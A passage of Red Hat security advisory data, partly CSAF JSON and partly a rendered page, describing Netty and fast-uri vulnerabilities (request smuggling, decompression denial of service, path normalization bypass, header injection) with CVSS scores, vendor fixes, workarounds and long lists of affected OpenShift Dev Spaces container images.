"summary": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm",
"url": "https://github.com/netty/netty/security/advisories/GHSA-cm33-6792-r9fm"
}
],
"release_date": "2026-05-13T18:01:52.500000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:09:05+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: Netty: High integrity impact due to improper DNS domain name constraint enforcement"
},
{
"cve": "CVE-2026-42581",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:02:26.404511+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477232"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s HttpObjectDecoder. A remote attacker can exploit this by sending a specially crafted HTTP/1.0 request that includes both `Transfer-Encoding: chunked` and `Content-Length` headers. While Netty correctly strips the conflicting `Content-Length` header for HTTP/1.1 messages, this guard is absent for HTTP/1.0. This can lead to HTTP request smuggling, where downstream proxies or handlers may misinterpret message boundaries, potentially allowing an attacker to bypass security controls or access unauthorized information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw. Netty\u0027s HttpObjectDecoder, used across various Red Hat products, improperly handles conflicting `Transfer-Encoding: chunked` and `Content-Length` headers in HTTP/1.0 requests. This allows a remote attacker to perform HTTP request smuggling, potentially bypassing security controls or gaining unauthorized access to information due to misinterpretation of message boundaries by downstream proxies or handlers.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.33.2"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "RHBZ#2477232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477232"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42581",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42581"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9",
"url": "https://github.com/netty/netty/security/advisories/GHSA-xxqh-mfjm-7mv9"
}
],
"release_date": "2026-05-13T17:54:44.492000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:09:05+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"category": "workaround",
"details": "To mitigate this issue, configure any reverse proxies or load balancers in front of Netty to either reject HTTP/1.0 requests containing both Transfer-Encoding: chunked and Content-Length headers, or to explicitly prioritize the Transfer-Encoding header over Content-Length for HTTP/1.0 traffic. This ensures consistent interpretation of message boundaries and prevents request smuggling attacks.",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: HTTP Request Smuggling due to improper handling of conflicting HTTP/1.0 headers"
},
{
"cve": "CVE-2026-42584",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2026-05-13T19:01:51.846351+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477224"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Important: A flaw in Netty\u0027s HttpClientCodec allows a remote attacker to cause data confusion. By sending a specially crafted sequence of HTTP responses, an attacker can cause subsequent HTTP responses to be parsed incorrectly, potentially leading to information disclosure or data integrity issues in applications utilizing Netty for HTTP client operations. This vulnerability affects various Red Hat products that bundle Netty, including Red Hat AMQ, Enterprise Application Platform, Red Hat Build of Quarkus, and Red Hat Build of Keycloak.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.33.2"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "RHBZ#2477224",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477224"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42584",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42584"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3",
"url": "https://github.com/netty/netty/security/advisories/GHSA-57rv-r2g8-2cj3"
}
],
"release_date": "2026-05-13T18:10:48.437000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:09:05+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: Netty: Incorrect HTTP response parsing leads to data confusion"
},
{
"cve": "CVE-2026-42587",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T19:01:35.415881+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477220"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in Netty\u0027s HTTP content decompression. A remote attacker can exploit this flaw by sending specially crafted compressed payloads using Brotli, Zstandard, or Snappy encodings, bypassing configured decompression limits. This leads to unbounded memory allocation, potentially causing an out-of-memory condition and rendering affected Red Hat systems unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat build of Quarkus 3.33.2"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "RHBZ#2477220",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477220"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42587",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42587"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"release_date": "2026-05-13T18:22:21.699000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T12:09:05+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:24502"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat build of Quarkus 3.33.2"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty: io.netty/netty-codec-http: io.netty/netty-codec-http2: Netty: Denial of Service via unbounded memory allocation in HTTP content decompression"
}
]
}
RHSA-2026:25123
Vulnerability from csaf_redhat - Published: 2026-06-10 19:42 - Updated: 2026-07-03 12:02A flaw was found in fast-uri. A remote attacker could exploit this vulnerability by providing a specially crafted Uniform Resource Locator (URL) containing percent-encoded path separators and dot segments. Due to incorrect processing, fast-uri would decode these elements before proper normalization, leading to distinct URLs resolving to the same internal path. This could allow an attacker to bypass security policies that rely on path-based comparisons, potentially gaining unauthorized access to resources.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
A flaw was found in Netty. The HttpProxyHandler component, which handles HTTP CONNECT requests, does not properly validate user-provided outbound headers. This allows an attacker to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This could lead to unexpected behavior or potential bypass of security controls on the proxy server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — |
Vendor Fix
